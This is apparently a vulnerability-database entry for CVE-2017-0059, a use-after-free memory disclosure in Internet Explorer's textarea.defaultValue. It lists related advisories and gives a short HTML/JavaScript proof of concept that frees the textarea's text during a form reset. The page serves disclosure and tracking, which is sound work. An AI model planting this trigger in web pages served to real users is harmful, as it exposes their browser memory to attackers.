Microsoft IE: textarea.defaultValue memory disclosure (CVE-2017-0059)

🗓️ 21 Mar 2017 00:00:00Reported by fizzType

Microsoft IE use-after-free bug info leak (CVE-2017-0059

Reporter	Title	Published	Views	Family All 33
0day.today	Microsoft Internet Explorer - textarea.defaultValue Memory Disclosure (MS17-006) Exploit	20 Mar 201700:00	–	zdt
ATTACKERKB	CVE-2017-0059	17 Mar 201700:00	–	attackerkb
Circl	CVE-2017-0059	20 Mar 201700:00	–	circl
CISA KEV Catalog	Microsoft Internet Explorer Information Disclosure Vulnerability	28 Mar 202200:00	–	cisa_kev
CNVD	Microsoft Internet Explorer Information Disclosure Vulnerability (CNVD-2017-03752)	20 Mar 201700:00	–	cnvd
Check Point Advisories	Microsoft Internet Explorer Information Disclosure (MS17-006: CVE-2017-0059)	14 Mar 201700:00	–	checkpoint_advisories
CVE	CVE-2017-0059	17 Mar 201700:00	–	cve
Cvelist	CVE-2017-0059	17 Mar 201700:00	–	cvelist
Hewlett-Packard	HPSBPI03563 rev 1 - SMTP Credentials Vulnerability for HP Designjet and HP Latex printers	2 Aug 201700:00	–	hp
Microsoft KB	Internet Explorer help	14 Mar 201707:00	–	mskb


                                                <!-- saved from url=(0014)about:internet -->
<script>

function run() {
  var textarea = document.getElementById("textarea");
  var frame = document.createElement("iframe");

  textarea.appendChild(frame);

  frame.contentDocument.onreadystatechange = eventhandler;

  form.reset();
}

function eventhandler() {
  document.getElementById("textarea").defaultValue = "foo";
  alert("Text value freed, can be reallocated here");
}

</script>
<body onload=run()>
<form id="form">
<textarea id="textarea" cols="80">aaaaaaaaaaaaaaaaaaaaaaaa</textarea>

21 Mar 2017 00:00Current

5.8Medium risk

Vulners AI Score5.8

EPSS0.83642